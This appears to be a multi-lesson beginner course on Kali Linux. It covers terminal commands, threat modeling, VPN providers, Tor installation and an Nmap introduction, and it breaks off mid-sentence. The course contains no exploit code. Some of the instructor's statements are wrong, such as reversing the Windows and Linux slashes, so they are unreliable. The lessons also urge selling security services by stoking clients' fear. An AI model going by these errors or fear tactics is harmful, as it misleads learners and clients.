Lesson 1: Introduction to Kali Linux Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution. Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for penetration-testing wireless LANs), Burp suite and OWASP ZAP (both web application security scanners). Kali Linux can run natively when installed on a computer’s hard disk, can be booted from a live CD or live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit Project’s Metasploit Framework, a tool for developing and executing security exploits. Introduction to Kali Linux :From kali website: Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution. Kali Linux Features Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards. All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our VCS. More than 300 penetration testing tools: After reviewing every tool that was included in BackTrack, we eliminated a great number of tools that either did not work or had other tools available that provided similar functionality. Free and always will be: Kali Linux, like its predecessor, is completely free and always will be. You will never, ever have to pay for Kali Linux. Open source Git tree: We are huge proponents of open source software and our development tree is available for all to see and all sources are available for those who wish to tweak and rebuild packages. FHS compliant: Kali has been developed to adhere to the Filesystem Hierarchy Standard, allowing all Linux users to easily locate binaries, support files, libraries, etc. Vast wireless device support: We have built Kali Linux to support as many wireless devices as we possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with numerous USB and other wireless devices. Custom kernel patched for injection: As penetration testers, the development team often needs to do wireless assessments so our kernel has the latest injection patches included. Secure development environment: The Kali Linux team is made up of a small group of trusted individuals who can only commit packages and interact with the repositories while using multiple secure protocols. GPG signed packages and repos: All Kali packages are signed by each individual developer when they are built and committed and the repositories subsequently sign the packages as well. Multi-language: Although pentesting tools tend to be written in English, we have ensured that Kali has true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job. Completely customizable: ARMEL and ARMHF support: Since ARM-based systems are becoming more and more prevalent and inexpensive, we knew that Kali’s ARM support would need to be as robust as we could manage, resulting in working installations for both ARMEL and ARMHF systems. Kali Linux has ARM repositories integrated with the mainline distribution so tools for ARM will be updated in conjunction with the rest of the distribution. Kali is currently available for the following ARM devices: - rk3306 mk/ss808 - Raspberry Pi - ODROID U2/X2 - Samsung Chromebook - EfikaMX - Beaglebone Black - CuBox - Galaxy Note 10.1 .................. Okay class, its important to realize that most of the commands in kali are GUI or graphic user interface unlike previous installations of backtrack which require terminal input. Terminal is like windows command prompt, with a derivative you will be quick to notice, in file paths in windows the slash is forwards \ In the linux enviroment, the slash is backwards / ***Important*** Filepaths are case sensitive and when launching a program you also have to type the extension. Ex. Root/user/admin/torhammer.py If you had the above program installed, the extension being ".py" would launch the program. Another cool thing about kali, and linux period, is if and when you learn a programming language, you can code your own programs in their "notepad" style program and save it as something like "hacklikeaboss.py" and it will save as a python file, then right click and change advanced settings to executable file andddddd voila! Your very own custom program has been created. Enough about kali, im sure youre ready to get started on lesson 2 Lesson 2 : Real World applications for kali, forming your own business, and introduction to terminal, the hacker's best friend. Lesson 2: Real World Applications for Kali Linux Greetings class: Real world applications for Kali Linux are very diverse. Incorperating them into your repertoire as a sales pitch is crucial to forming a thriving business model that will generate revenue for you and your company. Small business examples: Every 9 seconds a personal computer is hacked. Thousands of people either own their own business or work from home. These are businesses that you will start with at first to build a reputation. Stressing the importance of Data Security to the customer is an integral part of the sales pitch. Looking up articles about local businesses around your area, and even college databases being breached can not only raise awareness, but also raise the fear factor. Ever heard the term a little fear is healthy? Well fear sells, and in todays day and age everyone is digital. Some people run their business sites via wordpress, even blog on them daily about events. This consumes a good portion of time for the client, and if someone were to access that because they had a faulty line of code in their site, they could not only lose their investment, but lose customers and customer data as well. A Kali Linux application for this would be a tool called wpscan, which we will review later on, but it scans the site for vulnerabilities allowing you to report them to the sitemaster or admin. Its illegal to scan without permission, always get permission. Another tool to use would be nmap This tool scans open ports on wifi connections Open ports are like open doors that anyone with the right knowledge can access, and access things like customer data, and even credit card transaction information. You will find when launching these programs via the drop down menu that they launch a sort of command prompt via a program called terminal. Kali is already preconfigured to run root access, so a tutorial in sudo isnt necessary. Terminal accepts your commands and runs basically every function on kali and this is where you will spend most of your time. Everytime you start kali, if its a live disk and not a full install, i recommend opening up a terminal first thing Then type apt-get update This updates the files You can also search for upgraded software apt-get upgrade Other commands are listed below System Info date – Show the current date and time cal – Show this month's calendar uptime – Show current uptime w – Display who is online whoami – Who you are logged in as finger user – Display information about user uname -a – Show kernel information cat /proc/cpuinfo – CPU information cat /proc/meminfo – Memory information df -h – Show disk usage du – Show directory space usage free – Show memory and swap usage Keyboard Shortcuts Enter – Run the command Up Arrow – Show the previous command Ctrl + R – Allows you to type a part of the command you're looking for and finds it Ctrl + Z – Stops the current command, resume with fg in the foreground or bg in the background Ctrl + C – Halts the current command, cancel the current operation and/or start with a fresh new line Ctrl + L – Clear the screen command | less – Allows the scrolling of the bash command window using Shift + Up Arrowand Shift + Down Arrow !! – Repeats the last command command !$ – Repeats the last argument of the previous command Esc + . (a period) – Insert the last argument of the previous command on the fly, which enables you to edit it before executing the command Ctrl + A – Return to the start of the command you're typing Ctrl + E – Go to the end of the command you're typing Ctrl + U – Cut everything before the cursor to a special clipboard, erases the whole line Ctrl + K – Cut everything after the cursor to a special clipboard Ctrl + Y – Paste from the special clipboard that Ctrl + U and Ctrl + K save their data to Ctrl + T – Swap the two characters before the cursor (you can actually use this to transport a character from the left to the right, try it!) Ctrl + W – Delete the word / argument left of the cursor in the current line Ctrl + D – Log out of current session, similar to exit Learn the Commands apropos subject – List manual pages for subject man -k keyword – Display man pages containing keyword man command – Show the manual for command man -t man | ps2pdf - > man.pdf – Make a pdf of a manual page which command – Show full path name of command time command – See how long a command takes whereis app – Show possible locations of app which app – Show which app will be run by default; it shows the full path Searching grep pattern files – Search for pattern in files grep -r pattern dir – Search recursively for pattern in dir command | grep pattern – Search for pattern in the output of command locate file – Find all instances of file find / -name filename – Starting with the root directory, look for the file called filename find / -name ”*filename*” – Starting with the root directory, look for the file containing the string filename locate filename – Find a file called filename using the locate command; this assumes you have already used the command updatedb (see next) updatedb – Create or update the database of files on all file systems attached to the Linux root directory which filename – Show the subdirectory containing the executable file called filename grep TextStringToFind /dir – Starting with the directory called dir, look for and list all files containing TextStringToFind File Permissions chmod octal file – Change the permissions of file to octal, which can be found separately for user, group, and world by adding: 4 – read (r),2 – write (w), 1 – execute (x) Examples: chmod 777 – read, write, execute for all chmod 755 – rwx for owner, rx for group and world For more options, see man chmod. File Commands ls – Directory listing ls -l – List files in current directory using long format ls -laC – List all files in current directory in long format and display in columns ls -F – List files in current directory and indicate the file type ls -al – Formatted listing with hidden files cd dir – Change directory to dir cd – Change to home mkdir dir – Create a directory dir pwd – Show current directory rm name – Remove a file or directory called name rm -r dir – Delete directory dir rm -f file – Force remove file rm -rf dir – Force remove an entire directory dir and all it’s included files and subdirectories (use with extreme caution) cp file1 file2 – Copy file1 to file2 cp -r dir1 dir2 – Copy dir1 to dir2; create dir2 if it doesn't exist cp file /home/dirname – Copy the filename called file to the /home/dirname directory mv file /home/dirname – Move the file called filename to the /home/dirname directory mv file1 file2 – Rename or move file1 to file2; if file2 is an existing directory, moves file1 into directory file2 ln -s file link – Create symbolic link link to file touch file – Create or update file cat > file – Places standard input into file cat file – Display the file called file more file – Display the file called file one page at a time, proceed to next page using the spacebar head file – Output the first 10 lines of file head -20 file – Display the first 20 lines of the file called file tail file – Output the last 10 lines of file tail -20 file – Display the last 20 lines of the file called file tail -f file – Output the contents of file as it grows, starting with the last 10 lines Compression tar cf file.tar files – Create a tar named file.tar containing files tar xf file.tar – Extract the files from file.tar tar czf file.tar.gz files – Create a tar with Gzip compression tar xzf file.tar.gz – Extract a tar using Gzip tar cjf file.tar.bz2 – Create a tar with Bzip2 compression tar xjf file.tar.bz2 – Extract a tar using Bzip2 gzip file – Compresses file and renames it to file.gz gzip -d file.gz – Decompresses file.gz back to file Printing /etc/rc.d/init.d/lpd start – Start the print daemon /etc/rc.d/init.d/lpd stop – Stop the print daemon /etc/rc.d/init.d/lpd status – Display status of the print daemon lpq – Display jobs in print queue lprm – Remove jobs from queue lpr – Print a file lpc – Printer control tool man subject | lpr – Print the manual page called subject as plain text man -t subject | lpr – Print the manual page called subject as Postscript output printtool – Start X printer setup interface Network ifconfig – List IP addresses for all devices on the local machine iwconfig – Used to set the parameters of the network interface which are specific to the wireless operation (for example: the frequency) iwlist – used to display some additional information from a wireless network interface that is not displayed by iwconfig ping host – Ping host and output results whois domain – Get whois information for domain dig domain – Get DNS information for domain dig -x host – Reverse lookup host wget file – Download file wget -c file – Continue a stopped download SSH ssh user@host – Connect to host as user ssh -p port user@host – Connect to host on port port as user ssh-copy-id user@host – Add your key to host for user to enable a keyed or passwordless login User Administration adduser accountname – Create a new user call accountname passwd accountname – Give accountname a new password su – Log in as superuser from current login exit – Stop being superuser and revert to normal user Process Management ps – Display your currently active processes top – Display all running processes kill pid – Kill process id pid killall proc – Kill all processes named proc (use with extreme caution) bg – Lists stopped or background jobs; resume a stopped job in the background fg – Brings the most recent job to foreground fg n – Brings job n to the foreground Installation from source ./configure make make install dpkg -i pkg.deb – install a DEB package (Debian / Ubuntu / Linux Mint) rpm -Uvh pkg.rpm – install a RPM package (Red Hat / Fedora) Stopping & Starting shutdown -h now – Shutdown the system now and do not reboot halt – Stop all processes - same as above shutdown -r 5 – Shutdown the system in 5 minutes and reboot shutdown -r now – Shutdown the system now and reboot reboot – Stop all processes and then reboot - same as above startx – Start the X system Lesson 3: Threat assessment and how to sell it Good morning class, I hope you have had time to experiment with terminal commands and familiarize yourelves with the file structure of Kali Linux. Fear sells, 100 percent of the time. It's this fear that drives us to protect ourselves against the unknown. It's this fear that tells us money isn't a factor when it comes to protecting our investments. So, in short, today's lesson will be on threat assessment. Now for a little roleplay. Company xyz is a fortune 500 company, who buys and trades domains on the market, processing credit cars and bank transactions, storing customer information on encrypted servers, and has an option for member sign up. You ask them and they say they are running sql databases. How would you approach the company to sell your business? Respond to this email with your answer. My answer will be included in lesson 4 Now on threat assessment, Modeling There is no single solution for keeping yourself safe online. Digital security isn’t about which tools you use; rather, it’s about understanding the threats you face and how you can counter those threats. To become more secure, you must determine what you need to protect, and whom you need to protect it from. Threats can change depending on where you’re located, what you’re doing, and whom you’re working with. Therefore, in order to determine what solutions will be best for you, you should conduct a threat modeling assessment. When conducting an assessment, there are five main questions you should ask yourself: What do you want to protect?Who do you want to protect it from?How likely is it that you will need to protect it?How bad are the consequences if you fail?How much trouble are you willing to go through in order to try to prevent those? When we talk about the first question, we often refer to assets, or the things that you are trying to protect. An assett is something you value and want to protect. When we are talking about digital security, the assets in question are usually information. For example, your emails, contact lists, instant messages, and files are all assets. Your devices are also assets. Write down a list of data that you keep, where it’s kept, who has access to it, and what stops others from accessing it. In order to answer the second question, “Who do you want to protect it from,” it’s important to understand who might want to target you or your information, or who is your adversary. An adversary is any person or entity that poses a threat against an asset or assets. Examples of potential adversaries are your boss, your government, or a hacker on a public network. Make a list of who might want to get ahold of your data or communications. It might be an individual, a government agency, or a corporation. A threat is something bad that can happen to an asset. There are numerous ways that an adversary can threaten your data. For example, an adversary can read your private communications as they pass through the network, or they can delete or corrupt your data. An adversary could also disable your access to your own data. The motives of adversaries differ widely, as do their attacks. A government trying to prevent the spread of a video showing police violence may be content to simply delete or reduce the availability of that video, whereas a political opponent may wish to gain access to secret content and publish it without you knowing. Write down what your adversary might want to do with your private data. The capability of your attacker is also an important thing to think about. For example, your mobile phone provider has access to all of your phone records and therefore has the capability to use that data against you. A hacker on an open Wi-Fi network can access your unencrypted communications. Your government might have stronger capabilities. A final thing to consider is risk. Risk is the likelihood that a particular threat against a particular asset will actually occur, and goes hand-in-hand with capability. While your mobile phone provider has the capability to access all of your data, the risk of them posting your private data online to harm your reputation is low. It is important to distinguish between threats and risks. While a threat is a bad thing that can happen, risk is the likelihood that the threat will occur. For instance, there is a threat that your building might collapse, but the risk of this happening is far greater in San Francisco (where earthquakes are common) than in Stockholm (where they are not). Conducting a risk analysis is both a personal and a subjective process; not everyone has the same priorities or views threats in the same way. Many people find certain threats unacceptable no matter what the risk, because the mere presence of the threat at any likelihood is not worth the cost. In other cases, people disregard high risks because they don't view the threat as a problem. In a military context, for example, it might be preferable for an asset to be destroyed than for it to fall into enemy hands. Conversely, in many civilian contexts, it's more important for an asset such as email service to be available than confidential. Now, let’s practice threat modeling. If you want to keep your house and possessions safe, here are a few questions you might ask: Should I lock my door?What kind of lock or locks should I invest in?Do I need a more advanced security system?What are the assets in this scenario?The privacy of my homeThe items inside my homeWhat is the threat?Someone could break in.What is the actual risk of someone breaking in? Is it likely? Once you have asked yourself these questions, you are in a position to assess what measures to take. If your possessions are valuable, but the risk of a break-in is low, then you probably won’t want to invest too much money in a lock. On the other hand, if the risk is high, you’ll want to get the best locks on the market, and perhaps even add a security system. Lesson 4: Opsec, VPN, Tor. Opsec stands for "operational security" and is a term coined by the special forces in the United States military. When it comes to hacking, Opsec is essential as to not let your opponent know that you are on to them. If you are hired to test the security already in place, it would be obvious that you would need to learn ways to mask your attacks. Virtual Private Networks or VPNs: What Is A VPN? A VPN (Virtual Private Network) provides a secure way of connecting through a public network (such as the Internet) to a remote network/location. This remote network is typically a private network, such as a workplace or home network, or one provided by a commercial VPN service. A VPN can be thought to create a "tunnel" through the public network to your private network at the other end. All network traffic through this tunnel is encrypted to ensure it is kept secure and private. What Does A VPN Let Me Do? A VPN allows you to do a number of things you wouldn't otherwise be able to do connected to a standard network. This includes: Network Security & Privacy: All network traffic through your VPN connection is kept secure. This allows you to use public networks (such as at hotels, conferences, coffee shops, etc.) and wireless networks knowing your network traffic is kept safe and secure. Otherwise it is relatively easy for other people to view your network traffic, such as see what you are viewing, steal your information and login details, etc. Access Your Workplace Remotely: You can connect to your workplace's VPN and have access as if you were physically in the office. You can then do things like access file servers, computers, databases, email, internal webpages, and other services you might not have access to outside of your work network. Access Your Home Network: Connecting back home using a VPN allows you to access your computers remotely. Access files on your computer, view iTunes shares, take remote control of your computer, and access other services. Access Location Restricted Content: By connecting to a VPN server in another location you can make it appear to websites using geolocation that you are physically in the correct location for access. So when you're travelling overseas you can still view websites you would normally use at home, such as television, movie and music streaming websites. Bypass Restrictive Networks: Some networks may restrict access to the web services that can be accessed, meaning that many applications like VOIP, instant messenging, video chat, and games will not work. However using a VPN you can tunnel through such restrictions and allow all of your network applications to work. Viscosity even allows you to tunnel through a HTTP or SOCKS proxies to establish your VPN connection. Escape Censorship: VPNs allow you to bypass restrictive censorship and access websites and services that would otherwise be blocked. Some countries impose censorship on Internet access while in that country, and a VPN provides a way to still maintain access to the services you would normally use. Why Should I Use A VPN? Even if you have no desire to be able to access a private network remotely, a VPN is vital to ensure the security and privacy of your network traffic. Public networks, and in particular public wireless networks, provide an easy way for hackers and malicious users to listen in ("sniff") on your network usage. This may allow them to see what web pages you are viewing, steal username and passwords, steal session information to be able to log into sites as you, and extract other private data. In addition, skilled hackers may perform a "man in the middle" attack. This allows them to not only monitor in depth your network traffic, but also alter your traffic or inject their own in an attempt to fool a user into revealing important data. Using a VPN protects you from such attacks, as your network traffic is authenticated and encrypted, making it secure and private. How Does A VPN Work? A typical VPN consists of two components: the VPN client and the VPN server. A VPN client is the software that allows a user to connect their computer to the VPN server and establish the VPN connection. It is installed on the user's computer and communicates with the VPN server to create a secure link for the user's network traffic. The VPN Client is what the end user uses to control their VPN connection. Viscosity performs the duties of a VPN client. A VPN server is setup at the location users want to connect to, such as at a workplace or at home. A VPN Server usually configured and maintained by IT staff, however home users often set up their own VPN personal VPN server at home or at a remote location as well. End users rarely have to interact with the VPN Server. A VPN server will also perform authentication to ensure only registered users can connect to the VPN. All network traffic through the tunnel created between the VPN client and the VPN server is encrypted to keep it private and secure. What Is OpenVPN? OpenVPN is a popular VPN protocol that is based on SSL/TLS encryption. Like IPSec and PPTP, OpenVPN handles the connection between the VPN client and server. OpenVPN is rapidly gaining in popularity thanks to its high level of security, customizability, and compatibility with most network environments. VPN Service Providers There are many companies that specialize in providing a commercial VPN service. These companies are known as "VPN Service Providers". VPN Service Providers often have servers in multiple countries, allowing you to not only get the security and privacy benefits on a VPN, but also making it easy to access websites that restrict access to certain counties. Most VPN Service Providers charge a small monthly or yearly fee for access to their servers, however there are also a number of free service providers. The key to choosing a quality vpn comes down to two factors, 1) do they cooperate with united states gov subpoenas 2 do they keep logs (you dont want logs) TorGuard TorGuard's claim to fame is that they offer specific types of servers for different activities. That gives you the ability to connect to torrent-friendly services if you need to download something, encryption and anonymity- friendly servers if you just need a little privacy and security, and so on. They're also one of the few VPN service providers to take DNS leaking seriously, and they even offer their own test to make sure that your VPN—even if you don't use them—isn't leaking DNS and thus information you thought was secure. Depending on your usage habits and patterns, TorGuard has different plans for you. For our purposes though, their full VPN service will set you back $10/mo or $60/yr, and they have less expensive plans if you just want an anonymous proxy or a torrent proxy. Their full VPN service however features over 200 exit servers in 18 countries, no logging or data retention of any kind, and their network is set up in a way that they actually have no information to collect on their user activities—they don't know what you're doing or when you're connected. They delivered a really great response to Torrentfreak's questions that's well worth a read for more info. They also support multiple connectivity protocols, support for virtually every desktop and mobile OS, and even offer their customers encrypted, offshore email service if you want to take advantage. Those of you who praised TorGuard in the call for contenders thread noted that they have "Stealth" VPN servers to protect you against deep packet inspection (a technique used to capture and systematically decrypt or inspect encrypted data, usually used by corporate networks, university networks, or specific "agencies.") You also noted that they support OpenVPN, help you get connected via your home network, and have great customer service. IPVanish VPN IPVanish takes an interesting approach to privacy and security. They use shared IP addresses, so when they say no one has any idea what you're doing when you're connected, they mean it. That doesn't mean they're compromising security though—they have over 14,0000 IPs to share on over a hundred exit servers in 47 different countries. You can choose where you'd prefer to connect, which again is perfect for getting around location restrictions, and their encryption makes sure your traffic is safe from prying eyes. They support OS X, Windows, and Ubuntu (although it wouldn't be too hard to stretch that to other distributions), along with iOS and Android, and they offer configuration utilities so you can set you home router to connect to them as well. They feature multiple connection protocols, don't discriminate against traffic types or port usage, don't monitor your activities, and only log a few things. Torrentfreak gave them the nod as well. Accounts with IPVanish are$10/mo or $78/yr, and you can connect two devices at once (as long as they're using different protocols.) IPVanish earned high praise in the call for contenders thread for its speed while connected. How they manage to do it is impressive, but the service manages to hold itself to a high standard of privacy and security while giving you breakneck speeds that you may not be accustomed to with a VPN. The service proudly notes that they're happy with you streaming video or music while you're connected to get around pesky content blocks, especially if you're an expat who's currently abroad but wishes they could see their favorite TV shows back home or make use of their streaming music subscription. CyberGhost VPN CyberGhost has been around for a long time, they made a great showing in the call for contenders thread. Like any good, trustworthy VPN provider, they both encrypt all of the data that passes through your connection and anonymize your location. They offer free and paid subscription plans, so if you just need a little security on the go, you may be able to get away with a free account. The service just went through a massive overhaul about a year ago, where they removed traffic and bandwidth restrictions for free accounts, and improved security from the ground up. CyberGhost doesn't log any traffic, and they don't monitor what you're doing while you're connected. They do retain some information, but not much. They offer your choice of exit servers in 23 different countries (free users can pick from one of 14, still impressive for a free service), and you cansee server status at any time Their clients are easy to use, support virtually every mobile and desktop platforms, and they don't discriminate against traffic types, protocols, or IP addresses (in fact, they just donated 10,000 licenses to users in Turkey to get around their location-blocks.) The only major difference between free and pro CyberGhost accounts is that free accounts disconnect after 3 hours, and are limited to the official client, while pro accounts can use other connection protoctols and have way more servers in more countries to choose from. You'll pay $7/mo or $40/yr for a premium account, but if you need more than one device connected at any given time, you'll need to step up to Premium Plus, at $11/mo and $70/yr. Those of you who praised the service noted their great connection speeds, wealth of servers to choose from (even for free users). Read more in the nomination thread here. Do-It-Yourself Of course, no list of great options would be complete with the DIY approach. If you don't need exit servers in different countries, and your primary need is to encrypt and secure your data when you're away from home, you can roll yout own VPN with OpenVPN or a number of other free, open-source tools. Many of the best routers on the market support OpenVPN out of the box, and even if they don't, the DD-WRT or Tomato firmwares do, so if you can install those on your router, you'll be all set. The beauty of a home-rolled VPN is that you get to set the level of encryption, you get complete control over who connects and who has access to what parts of your home network, and where your data goes from there. Of course, this setup is best for people traveling who want to encrypt their data while they're on the go, but with a couple of friends, it's easy to set up a mesh network that would get you around content restrictions and port blocks. Similarly, advanced users can fire up a VPN on their preferred host or VPS provider and keep their VPN running there while they connect to it when necessary. The sky's the limit with the DIY option, it just takes the skill and knowhow to do it, and some compromise on the level of features and tools you get. We have more than a few honorable mentions this week, including one of my personal favorites, Hideman VPN, for their cross-platform, mobile-friendly, no-logging VPN service—complete with free VPN options for people just looking for a little security on the go without shelling out for a premium service. Also noteworthy are the great people over at Tunnelbear, who are constantly working to improve and update their service to help you get around regional restrictions and blocks—-and recently unveiled a browser add-on to tunnel some services but not others, giving you even more control over your connection. We'll also give the nod to AirVPN, a popular pick that packs in way more features than you might possibly need. You can forward remote ports, pick and choose exit services in multiple countries, and even generate an OpenVPN config through their wizard to connect your home network to their service all the time—oh, and they don't log, don't discriminate against protocols, and they have no idea when you're connected. If you're looking to walk the line between a truly DIY option and a VPN that you roll at home, configure, and then connect to externally, they're worth a look. We should also highlight VyprVPN, which was a really tough call. VyprVPN is owned by the same company that owns Giganews, the Usenet service provider. You can use VyprVPN as a stand-alone VPN client, but you'll sign up for Giganews when you get it. They did very well in the call for contenders thread—although many of their votes were from first-time accounts—and they certainly talk the talk on privacy issues. They have multiple exit servers in multiple countries, strong encryption, and they're improving their service all the time. However, they have a history of logging user data, sometimes a lot of user data, and at the very least log user sessions and data for troubleshooting, acceptable use issues, and more for up to 90 days. That's not an issue if you don't care about logging, but they were cagey with Torrentfreak back in 2011on the topic, cagey with me when I last spoke to a rep from the company, andthis Reddit thread is rather illuminating as well. Still, there are signs thatthings may be changing with VyprVPN. The feature set and the face of the company both look good, and they combine Usenet with VPN services which is great, but we don't feel comfortable calling them one of the best if we can't verify their commitment to your privacy and anonymity as well as the security of your data. A final note—something we mentioned when we talked —don't fall into the geography trap, assuming that an overseas VPN or one outside your country is somehow safer or more committed to privacy than ones based in your own or subject to your own laws. A local VPN that doesn't keep logs and has none to turn over is more trustworthy than an overseas VPN that logs everything and is happy to turn your data over to anyone who asks—and there are definitely VPN providers that fall in both categories Tor — a privacy oriented encrypted anonymizing service, has announced the launch of its next version of Tor Browser Bundle, i.e. Tor version 4.0.4, mostly supposed to improve the built-in utilities, privacy and security of online users on the Internet. Tor Browser helps users to browse the Internet in a complete anonymous way. The powerful Tor Browser Bundle, an anonymous web browser developed by the Tor Project, received some updates in its software. Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox configured to protect the users’ anonymity via Tor and Vidalia. The anonymity suite also includes 3 Firefox extensions: Torbutton, NoScript and HTTPS-Everywhere. NEW FEATURES The latest version, Tor Browser Bundle 4.0.4, has been recently released, with a few number of new features: Updated to Firefox to 31.5.0esr with important security updates.Update OpenSSL to 1.0.1lUpdate NoScript to 2.6.9.15Update HTTPS-Everywhere to 4.0.3 BUG FIXES Meanwhile, the new Tor version 4.0.4 also include some bugfixes:Bug 14203: Prevent meek from displaying an extra update notificationBug 14849: Remove new NoScript menu option to make permissions permanentBug 14851: Set NoScript pref to disable permanent permissions "A new release for the stable Tor Browser is available from the Tor Browser Project page and also from our distribution directory," states the Tor project team. Tor is generally thought to be a place where users come online to hide their activities and remain anonymous. Tor is an encrypted anonymizing network considered to be one of the most privacy oriented service and is mostly used by activists, journalists to circumvent online censorship and surveillance efforts by various countries. However, late last year we have seen large scale cyber attack on Tor network that quietly seized some of its network specialized servers called Directory Authorities (DA), the servers that help Tor clients to find Tor relays in the anonymous network service. On the other end of the side, last month 12 high-capacity Tor Middle relays was launched by the Polaris — a new initiative by Mozilla, the Tor Project and the Center of Democracy and Technology — in order to help build more privacy controls into technology. The addition of high-capacity Tor middle relays to the Tor network helps reduce finite number of Tor connections occurring at the same time. Installing Tor in Kali Linux: Step 1: Getting tor service ready There are 3 ways of installing Tor service in Kali Linux. You can install Tor by following any of these options: Option #1: Install Tor from Kali Repository Tor is available in Kali repository, to install it directly from the repository open your Terminal and type this: apt-get install tor If no error occurs, follow the second step. Option #2: Install Tor from Debian Wheezy Repository If you can’t install Tor using the first method then you may try this option. In this way we are going to add the official Tor repository according to our Debian distribution. Not to be confused, Kali is actually based on Debian and it uses the package management from “Wheezy”. So we are going to use “Wheezy” as our distribution. Now open your terminal and follow these steps: Step #1: Add repo to sources.list file Lets add the distribution in the list by opening the sources.list file leafpad /etc/apt/sources.list Now add the following line at the bottom of the file, deb http://deb.torproject.org/torproject.org wheezy main Step #2: Add GPG Keys Now we need to add the gpg key used to sign the packages by running the following commands: gpg --keyserver keys.gnupg.net --recv 886DDD89 gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add - Step #3: Update package lists Lets refresh our sources: apt-get update Step #4: Install singing keys Now, before installing the Tor we must add the signing key, apt-get install deb.torproject.org-keyring Step #5: Install Tor from Debian repository Finally, apt-get install tor Now Tor should be installed! If no error occurs, follow the second step. Option #3: Install Tor from development branch If you are an advanced user and you want to install Tor using the development branch then this method is for you. Step #1: Add Tor project repository to sources.list You need to add a different set of lines to your /etc/apt/sources.list file: deb http://deb.torproject.org/torproject.org wheezy main debhttp://deb.torproject.org/torproject.org torexperimental-0.2.5.x- wheezy main Step #2: Add GPG keys, keyring and install Tor Then run the following commands at your command prompt: gpg --keyserver keys.gnupg.net --recv 886DDD89 gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add - apt-get update apt-get install tor deb.torproject.org-keyring Now Tor should be installed! If no error occurs, follow the second step. Note: This release will provide you more features but it contains bugs too. Option #4: Build and Install Tor from sources If you want to build your own debs from source you must first add an appropriate deb-srcline to sources.list. deb-src http://deb.torproject.org/torproject.org wheezy main debsrchttp://deb.torproject.org/torproject.org wheezy main deb-srchttp://deb.torproject.org/torproject.org torexperimental-0.2.5.x--wheezy main You also need to install the necessary packages to build your own debs and the packages needed to build Tor: apt-get install build-essential fakeroot devscripts apt-get build-dep tor Then you can build Tor in ~/debian-packages: mkdir ~/debian-packages; cd ~/debian-packages apt-get source tor cd tor-* debuild -rfakeroot -uc -us cd .. Now you can install the new package: dpkg -i tor_*.deb Step #2: Downloading and Running Tor bundle Download the Tor Bundle from here, https://www.torproject.org/projects/torbrowser.html.en Download the architecture-appropriate file above, save it somewhere, then run one of the following two commands to extract the package archive: tar -xvzf tor-browser-gnu-linux-i686-2.3.25-15-dev-LANG.tar.gz or (for the 64-bit version): tar -xvzf tor-browser-gnu-linux-x86_64-2.3.25-16-dev-LANG.tar.gz (where LANG is the language listed in the filename). Once that’s done, switch to the Tor browser directory by running: cd tor-browser_LANG (whereLANG is the language listed in the filename). To run the Tor Browser Bundle, execute the start-tor-browser script: ./start-tor-browser This will launch Vidalia and once that connects to Tor, it will launch Firefox. Note: Do not unpack or run TBB as root. (though in Kali Linux, it doesn’t make any differences) Lesson 5: Introduction to NMap Nmap is a very useful tool, especially for identifying open ports subject to attacks and infiltration, its GUI is user friendly and boasts a wide variety of features. Nmap (“Network Mapper”) is a free and open source utility for network exploration and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available. This chapter uses fictional stories to provide a broad overview of Nmap and how it is typically used. An important legal section helps users avoid (or at least be aware of) controversial usage that could lead to ISP account cancellation or even civil and criminal charges. It also discusses the risks of crashing remote machines as well as miscellaneous issues such as the open source Nmap license (based on the GNU GPL), and copyright. Nmap Overview and Demonstration Sometimes the best way to understand something is to see it in action. This section includes examples of Nmap used in (mostly) fictional yet typical circumstances. Nmap newbies should not expect to understand everything at once. This is simply a broad overview of features that are described in depth in later chapters. The “solutions” included throughout this book demonstrate many other common Nmap tasks for security auditors and network administrators. Avatar Online Felix dutifully arrives at work on December 15th, although he does not expect many structured tasks. The small San Francisco penetration-testing firm he works for has been quiet lately due to impending holidays. Felix spends business hours pursuing his latest hobby of building powerful Wi-Fi antennas for wireless assessments and war driving exploration. Nevertheless, Felix is hoping for more business. Hacking has been his hobby and fascination since a childhood spent learning everything he could about networking, security, Unix, and phone systems. Occasionally his curiosity took him too far, and Felix was almost swept up in the 1990 Operation Sundevil prosecutions. Fortunately Felix emerged from adolescence without a criminal record, while retaining his expert knowledge of security weaknesses. As a professional, he is able to perform the same types of network intrusions as before, but with the added benefit of contractual immunity from prosecution and even a paycheck! Rather than keeping his creative exploits secret, he can brag about them to client management when presenting his reports. So Felix was not disappointed when his boss interrupted his antenna soldering to announce that the sales department closed a pen-testing deal with the Avatar Online gaming company. Avatar Online (AO) is a small company working to create the next generation of massive multi-player online role-playing games (MMORPGs). Their product, inspired by the Metaverse envisioned in Neil Stevenson's Snow Crash, is fascinating but still highly confidential. After witnessing the high-profile leak of Valve Software's upcoming game source code, AO quickly hired the security consultants. Felix's task is to initiate an external (from outside the firewall) vulnerability assessment while his partners work on physical security, source code auditing, social engineering, and so forth. Felix is permitted to exploit any vulnerabilities found. The first step in a vulnerability assessment is network discovery. This reconnaissance stage determines what IP address ranges the target is using, what hosts are available, what services those hosts are offering, general network topology details, and what firewall/filtering policies are in effect. Determining the IP ranges to scan would normally be an elaborate process involving ARIN (or another geographical registry) lookups, DNS queries and zone transfer attempts, various web sleuthing techniques, and more. But in this case, Avatar Online explicitly specified what networks they want tested: the corporate network on 6.209.24.0/24 and their production/DMZ systems residing on 6.207.0.0/22. Felix checks the IP whois records anyway and confirms that these IP ranges are allocated to 